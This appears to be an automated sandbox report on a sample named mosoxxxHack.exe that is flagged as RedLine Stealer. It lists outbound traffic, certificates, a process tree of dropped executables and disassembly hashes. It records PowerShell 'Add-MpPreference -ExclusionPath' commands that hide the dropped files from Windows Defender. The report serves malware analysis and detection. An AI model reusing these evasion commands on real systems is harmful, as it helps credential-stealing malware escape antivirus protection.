Aug 20, 2021 17:10:48.290436029 CEST	9855	OUT	Data Raw: 38 53 69 41 a0 42 8e b4 e1 de 9b 4b 4d 08 5a 28 a5 a6 48 b8 a4 c5 28 14 a0 62 9d 80 6e 28 a5 34 94 02 0a 29 28 a4 01 4b 45 21 a0 05 a5 14 0a 29 80 b4 b4 94 a2 98 85 a3 34 94 50 84 3b 34 0e b4 0a 33 54 03 a8 a6 e6 81 41 36 16 96 92 8a 00 5a 28 a0 Data Ascii: 8SiABKMZ(H(bn(4)(KE!)4P;43TA6Z(SE-%-14JZ8ST!iE6UQIK@hU8STc/iEYGZm(4GN&iiLKf4j,L38)-4h&-$`4+
Aug 20, 2021 17:10:48.313600063 CEST	9858	OUT	Data Raw: 10 94 a0 52 e2 8e d4 c4 15 ea 5f 07 3c 21 a1 78 af fb 6b fb 6a c7 ed 5f 66 f2 3c af df 3a 6d dd e6 6e fb ac 33 f7 47 5f 4a f2 da f6 3f 81 77 16 30 5a f8 95 35 0b 88 61 82 65 b7 53 e7 4a 10 30 c4 a0 f2 48 f5 ac 6b df 91 d8 d2 85 b9 f5 3d 07 fe 15 Data Ascii: R_<!xkj_f<:mn3G_J?w0Z5aeSJ0Hk=st/n.yi2<O5EG*=A=z<?PHKb,I,9\:r0\|psm/M;KaY<bAyk>0zL^Xd
Aug 20, 2021 17:10:48.313683033 CEST	9868	OUT	Data Raw: ff 00 b2 d7 b0 fd 9a c5 ff 00 87 15 e4 df 15 a2 8e dc 44 90 9c a9 97 3f f8 ed 6f 42 ba 94 ad 63 2a b8 67 06 a5 73 c5 c9 34 dc 1a 93 02 93 15 91 dd 73 a0 f0 e7 88 93 4a 8a 5b 7b a1 23 c2 7e 68 f6 00 48 3d c7 3d 8f f9 eb 5b da 77 8b 6c ef ae 7c 89 Data Ascii: D?oBc*gs4sJ[{#~hH==[wl\|#x,e`9"AZRKCFg[j0NoqGC\Zcv]==-_G=kG8vqRU:EsIRq KcR,RN
Aug 20, 2021 17:10:48.314168930 CEST	9872	OUT	Data Raw: af df 49 f9 22 ea 3f dd 20 14 0a 4a 51 d2 ba 0e 51 c2 8a 41 4b 52 48 b4 a2 92 96 81 0b 4b 49 4b 48 90 a2 8a 29 00 52 d2 51 40 0b 45 14 50 01 4b 49 8a 5c 52 60 02 a4 8c 65 d4 7a 9a 68 ab 16 71 ef b9 41 ef 51 51 da 2c aa 6a f3 48 d0 f8 86 98 d2 b4 Data Ascii: I"? JQQAKRHKIKH)RQ@EPKI\R`ezhqAQQ,jHC&zW/WYUuSi^x?hyW=kO}[d+aX``! 5q!Gj4J<S?qpx&)uIhx`f$))SY
Aug 20, 2021 17:10:48.378817081 CEST	9914	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:48 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 20, 2021 17:09:47.575001955 CEST	162.159.135.233	443	192.168.2.3	49713	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
Aug 20, 2021 17:09:47.575001955 CEST	162.159.135.233	443	192.168.2.3	49713	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		3b5074b1b5d032e5620f69f9f700ff0e
Aug 20, 2021 17:10:47.350147963 CEST	162.159.135.233	443	192.168.2.3	49723	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Aug 20, 2021 17:10:47.350147963 CEST	162.159.135.233	443	192.168.2.3	49723	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: mosoxxxHack.exe PID: 3008 Parent PID: 6112

General

Start time:	17:08:57
Start date:	20/08/2021
Path:	C:\Users\user\Desktop\mosoxxxHack.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\mosoxxxHack.exe'
Imagebase:	0x400000
File size:	2674196 bytes
MD5 hash:	83D48CEB05204219598796CF99ADE13C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.244119121.0000000000CB3000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.361979737.0000000002E00000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.365676474.0000000004115000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.362118888.0000000002F40000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 4908 Parent PID: 3008

General

Start time:	17:08:59
Start date:	20/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: a.exe PID: 6552 Parent PID: 3008

General

Start time:	17:09:53
Start date:	20/08/2021
Path:	C:\Users\user\AppData\Local\Temp\a.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\a.exe'
Imagebase:	0x620000
File size:	1564672 bytes
MD5 hash:	E18585565F915216436E7939027E2E04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000011.00000002.406356590.0000000002B06000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 32%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 5712 Parent PID: 6552

General

Start time:	17:10:14
Start date:	20/08/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe'
Imagebase:	0x60000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5700 Parent PID: 5712

General

Start time:	17:10:15
Start date:	20/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: a.exe PID: 5704 Parent PID: 6552

General

Start time:	17:10:15
Start date:	20/08/2021
Path:	C:\Users\user\AppData\Local\Temp\a.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\a.exe
Imagebase:	0x5f0000
File size:	1564672 bytes
MD5 hash:	E18585565F915216436E7939027E2E04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: drbux.exe PID: 1380 Parent PID: 5704

General

Start time:	17:10:19
Start date:	20/08/2021
Path:	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe'
Imagebase:	0xd70000
File size:	1564672 bytes
MD5 hash:	E18585565F915216436E7939027E2E04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 32%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 4832 Parent PID: 1380

General

Start time:	17:10:40
Start date:	20/08/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe'
Imagebase:	0x60000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1036 Parent PID: 4832

General

Start time:	17:10:40
Start date:	20/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: drbux.exe PID: 4856 Parent PID: 1380

General

Start time:	17:10:41
Start date:	20/08/2021
Path:	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
Imagebase:	0x6f0000
File size:	1564672 bytes
MD5 hash:	E18585565F915216436E7939027E2E04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: mosoxxxHack.exe PID: 3008 Parent PID: 6112 mosoxxxHack.exeCOMMON

Executed Functions

Function 0277D830, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.359359847.000000000277D000.00000040.00000001.sdmp, Offset: 0277D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e972a797003d1f8b88eabe4a4cc45c8305fd8076228e146fe4b9ddd81e548da
Instruction ID: c36571c6f9eb8e40f39c8639e0a99128785cbe59dd529d69de0c6028b527b515
Opcode Fuzzy Hash: 8e972a797003d1f8b88eabe4a4cc45c8305fd8076228e146fe4b9ddd81e548da
Instruction Fuzzy Hash: 8E212871500340EFDF15DF50D8C0B16BBA6FF88714F24C6A9E9491B246C33AD826CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0277D5EC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.359359847.000000000277D000.00000040.00000001.sdmp, Offset: 0277D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce0af5a61f04a4e4c455164bb1926a475d663fc90ee0e9605093f4180f830d5f
Instruction ID: 459d166702fdc97bc5ea6f66f580e4988a00037ccf8ff470680279ebc4f13185
Opcode Fuzzy Hash: ce0af5a61f04a4e4c455164bb1926a475d663fc90ee0e9605093f4180f830d5f
Instruction Fuzzy Hash: CD2122B1504244DFDF21DF50D8C0B26BF66FF88364F2089A9E80D8B256C336D816CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0278D2F4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.359520938.000000000278D000.00000040.00000001.sdmp, Offset: 0278D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3c35f12b3fa84f7619a7a86b5e3c6918e84ec128638b4014d0c9e4c15d52069
Instruction ID: c93a8836f0fcd167067b60d09bcbdc6dc7d1abfbd4271760c9497d23e989e5a6
Opcode Fuzzy Hash: b3c35f12b3fa84f7619a7a86b5e3c6918e84ec128638b4014d0c9e4c15d52069
Instruction Fuzzy Hash: 13212E71544740DFDB20EF64D8C4B1AFB65FB84324F24C569D8095BB86C33AD816CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0278D4A4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.359520938.000000000278D000.00000040.00000001.sdmp, Offset: 0278D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17fb062bc8bb0c81452a0315a60242a7df63f3d9ddfbfa6f0d2ea41e22a0a4fa
Instruction ID: e28503c2a17d2c6d7787ab449033c65407f69e33e83574b2af07f3c0ec475f6f
Opcode Fuzzy Hash: 17fb062bc8bb0c81452a0315a60242a7df63f3d9ddfbfa6f0d2ea41e22a0a4fa
Instruction Fuzzy Hash: 812129B1544240DFDB15EF74D8C4B16BBA5FB84318F20C96EE8094B392C736E816CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0277D82B, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.359359847.000000000277D000.00000040.00000001.sdmp, Offset: 0277D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2734afbb232bdaaa76931ee23e14da7b24cf0ff6f31069efbd61b056adab227c
Instruction ID: ae700770d292a8576058e3ebbdbecc321e6df8fd2f0cf91b561aee0c975f9c4b
Opcode Fuzzy Hash: 2734afbb232bdaaa76931ee23e14da7b24cf0ff6f31069efbd61b056adab227c
Instruction Fuzzy Hash: 5E218C76404280DFDF16CF10D9C4B56BF62FF88314F28C6A9D9484A65AC33AD426CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0277D5E7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.359359847.000000000277D000.00000040.00000001.sdmp, Offset: 0277D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96dd7ee76899e1527d065f511c2b0409c128e9f12642dfba300a5e3327784422
Instruction ID: 28e09b3af6e85b3f60a5ba3314f78826062b6ad4d9f742dbde8259733ea07d41
Opcode Fuzzy Hash: 96dd7ee76899e1527d065f511c2b0409c128e9f12642dfba300a5e3327784422
Instruction Fuzzy Hash: 15118E76504280DFDF16DF10D9C4B16BF62FF84324F24C6A9D8494B656C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0278D2EF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.359520938.000000000278D000.00000040.00000001.sdmp, Offset: 0278D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d09c727f08000a246ed963221ce502eb97169c45439f7ccd4c20e87f581f3f4
Instruction ID: f45eb3c8e699d3ea9fbd2fe721bee6ce36979a95b6a7b5223dd94ae637cc202f
Opcode Fuzzy Hash: 2d09c727f08000a246ed963221ce502eb97169c45439f7ccd4c20e87f581f3f4
Instruction Fuzzy Hash: CA11C175544280DFDB12DF20D5C4B19FF62FB84324F24C6AAD8494BA86C33AD40ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0278D49F, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.359520938.000000000278D000.00000040.00000001.sdmp, Offset: 0278D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a05af1c6819cd59317c951907c7f5327793bcf832f9de75d53684009c45c6206
Instruction ID: 24876c8bd35031db5fd9a4493eaf109b6354d808f6b7d7791a45def9dae8fae5
Opcode Fuzzy Hash: a05af1c6819cd59317c951907c7f5327793bcf832f9de75d53684009c45c6206
Instruction Fuzzy Hash: 1111DD75544280CFDB12DF24C5C4B15BFB2FB84328F24C6AAD8494B696C33AD50ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0277D01D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.359359847.000000000277D000.00000040.00000001.sdmp, Offset: 0277D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8784919c042a61f5d814908cfabea9351cc28944b316e4c63f044bdf19dca9db
Instruction ID: f1b98805f3432b2776f54adcee8ce49bbc0bec90897f0a1bce687e99dc96f92a
Opcode Fuzzy Hash: 8784919c042a61f5d814908cfabea9351cc28944b316e4c63f044bdf19dca9db
Instruction Fuzzy Hash: 1E01D671508340AEEF308A65DC84BA7BF98EF41278F18D45AED095F287C77A9845CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0277D007, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.359359847.000000000277D000.00000040.00000001.sdmp, Offset: 0277D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee1b2e2c9d8aa7d49c8391fa3eba823631db5a3b33aee5e5b2b424c9e0711ffb
Instruction ID: c3cd3d100c2e9452a0b3e6c095af408b58470b7b7a2f80e00fcfa00ee75862b4
Opcode Fuzzy Hash: ee1b2e2c9d8aa7d49c8391fa3eba823631db5a3b33aee5e5b2b424c9e0711ffb
Instruction Fuzzy Hash: 0601007140D3C05FDB128B258894752BFB4DF43224F1985DBD9849F297C3695849CB72

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: a.exe PID: 6552 Parent PID: 3008 a.exeCOMMON

Executed Functions

Function 04FD5748, Relevance: 6.1, APIs: 4, Instructions: 125threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 04FD57B8
GetCurrentThread.KERNEL32 ref: 04FD57F5
GetCurrentProcess.KERNEL32 ref: 04FD5832
GetCurrentThreadId.KERNEL32 ref: 04FD588B

Memory Dump Source

Source File: 00000011.00000002.420112441.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: acd5c6f8dc35f32a0d969beac87d8497b05691092e0c65655451a30e27922495
Instruction ID: 72589ec6b61b193d864f76570c7005a2b7d9270f597da87a442071550b3fd024
Opcode Fuzzy Hash: acd5c6f8dc35f32a0d969beac87d8497b05691092e0c65655451a30e27922495
Instruction Fuzzy Hash: 8A5163B09002498FEB11DFA9D588BDEBBF1EF48314F24886DE419A7351C774A845CF66

Uniqueness

Uniqueness Score: -1.00%

Function 04FD5758, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 04FD57B8
GetCurrentThread.KERNEL32 ref: 04FD57F5
GetCurrentProcess.KERNEL32 ref: 04FD5832
GetCurrentThreadId.KERNEL32 ref: 04FD588B

Memory Dump Source

Source File: 00000011.00000002.420112441.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 84721287f05839b00446c1a760c90c185ffda8dee6c344b5234f8f7ea66a007c
Instruction ID: e7b62cf354a182c4d4f733cffcc7b29214a70c36a0f1752895c2f36876e98dff
Opcode Fuzzy Hash: 84721287f05839b00446c1a760c90c185ffda8dee6c344b5234f8f7ea66a007c
Instruction Fuzzy Hash: 945163B09006498FEB10DFA9D588BDEBBF1EB48314F24886DE419A7350C778A845CF66

Uniqueness

Uniqueness Score: -1.00%

Function 04FDA7A8, Relevance: 1.7, APIs: 1, Instructions: 227COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 04FDAA2A

Memory Dump Source

Source File: 00000011.00000002.420112441.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c1552fcdda7755a8f3a4d6ebacdfeafb3fc7bb6a87facea6a7027fd7e1aad3b9
Instruction ID: 66d8a8db24ae52e563f08eea943b57f601032b8d0cb6f2c60b1c86bba1318f4f
Opcode Fuzzy Hash: c1552fcdda7755a8f3a4d6ebacdfeafb3fc7bb6a87facea6a7027fd7e1aad3b9
Instruction Fuzzy Hash: 2E9113B0E00B058FDB24DFA9D54069ABBF2BF48304F14892AD44AE7A50E735E946CF95

Uniqueness

Uniqueness Score: -1.00%

Function 04FDC9D8, Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 04FDCB99

Memory Dump Source

Source File: 00000011.00000002.420112441.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 393583289c928bc2a4618ccd14b96b4e02436bc23729c7ed31e5736ca4ab8509
Instruction ID: 9f13c16f9a642048ef5d009b8fd5156b5f186bcc55698e502eac5c754488324b
Opcode Fuzzy Hash: 393583289c928bc2a4618ccd14b96b4e02436bc23729c7ed31e5736ca4ab8509
Instruction Fuzzy Hash: 6A7179B4D00258DFDF20CFA9D984ADEBBB1BF09304F1491AAE908B7211D734AA85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 04FDC9CC, Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 04FDCB99

Memory Dump Source

Source File: 00000011.00000002.420112441.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b7a12134733c2d5ce71a81903f3a323e5d4f693486b74bf4b9c53f5d46237da4
Instruction ID: 196ac142e215ebc4e116177abe9919a5c716b0d363484695181b1f72396945f1
Opcode Fuzzy Hash: b7a12134733c2d5ce71a81903f3a323e5d4f693486b74bf4b9c53f5d46237da4
Instruction Fuzzy Hash: B3717AB4D00258DFDF21CFA9D984ADDBBB1BF09304F2491AAE908B7211D734AA85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00EDDA60, Relevance: 1.6, APIs: 1, Instructions: 112libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 00EDDB69

Memory Dump Source

Source File: 00000011.00000002.404029628.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: db6c26c87baff051881cbe03790c16689424e47db2c4821e4fbe9c231a35649d
Instruction ID: ed94312eb7e043950b492166e8a2d98e600155d529d2a4cb7dfbbf181b1fdeb8
Opcode Fuzzy Hash: db6c26c87baff051881cbe03790c16689424e47db2c4821e4fbe9c231a35649d
Instruction Fuzzy Hash: 8A41EFB0D042588FDB10CFA9D885B9DBBB1FB49318F20A12AE815BB394D7B49846CF55

Uniqueness

Uniqueness Score: -1.00%

Function 04FD5980, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04FD5A4B

Memory Dump Source

Source File: 00000011.00000002.420112441.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 52dfb77f5319d081c179172e63fe159a0d5e142107d91406b24cd53e80ac5cbe
Instruction ID: 8adc9df56c84366790883e6706e645d0c4ed15c441a268ac37e8aa5c0babdf51
Opcode Fuzzy Hash: 52dfb77f5319d081c179172e63fe159a0d5e142107d91406b24cd53e80ac5cbe
Instruction Fuzzy Hash: C04164B9D002589FCF00CFA9D984ADEBBF5BB09310F24902AE918BB310D335A955CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9CC8, Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 04FDAD3A

Memory Dump Source

Source File: 00000011.00000002.420112441.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 00c3bd821553934698e34e8520ce2e69ffbf692ddb65e594babdfd24afc3ddf2
Instruction ID: 915fecdbf451c98ba24b8f36a73912a2e3d9f131c20e547a7665856da2320771
Opcode Fuzzy Hash: 00c3bd821553934698e34e8520ce2e69ffbf692ddb65e594babdfd24afc3ddf2
Instruction Fuzzy Hash: 5C4197B4D002589FCB10CFA9D884A9EFBF5BB49314F14902AE819B7320D374A946CF98

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9EF4, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04FDF381

Memory Dump Source

Source File: 00000011.00000002.420112441.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 45b5c05d1ddfa784ff169dacc352c2c290ae2879b86212813f5f7a373e5c3008
Instruction ID: 2543f845ec22b3ff44d7670760669f4ed3bbc54f23d8e6f028a4e6a1b0506315
Opcode Fuzzy Hash: 45b5c05d1ddfa784ff169dacc352c2c290ae2879b86212813f5f7a373e5c3008
Instruction Fuzzy Hash: D04119B5A002058FDB14DF99C448EAABBF6FF88314F29C459D519A7321D775E842CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04FDAC88, Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 04FDAD3A

Memory Dump Source

Source File: 00000011.00000002.420112441.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 053d65dba6095ef56ab3211dcb6263da46b10844db908973c62e30de30e8d0eb
Instruction ID: 2f3fb2e7175c76d1a3f0826f5ce88e5cbf7fb783cefb8d4ae580a9c26c150464
Opcode Fuzzy Hash: 053d65dba6095ef56ab3211dcb6263da46b10844db908973c62e30de30e8d0eb
Instruction Fuzzy Hash: 1B4197B4D002489FCB14CFA9E484A9EFBF1BB49314F24906AE919BB320D734A946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00EDD788, Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00EDD82F

Memory Dump Source

Source File: 00000011.00000002.404029628.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e11a17f74d01e41f61c65b2c626fc207e81752ba367fdd0a0e663c456e1657c1
Instruction ID: 2cd0ba76f488d583e1be5cdcf9e915e60c760e1dfb34136c8eddc027a74a8587
Opcode Fuzzy Hash: e11a17f74d01e41f61c65b2c626fc207e81752ba367fdd0a0e663c456e1657c1
Instruction Fuzzy Hash: 233178B8D042589FCB14CFA9E880ADEFBB5FB49310F24902AE818B7310D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04FDA998, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 04FDAA2A

Memory Dump Source

Source File: 00000011.00000002.420112441.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 62b370056186f8de9b4383856482780c913f2568f9075f3de13fb1525ecfbc9f
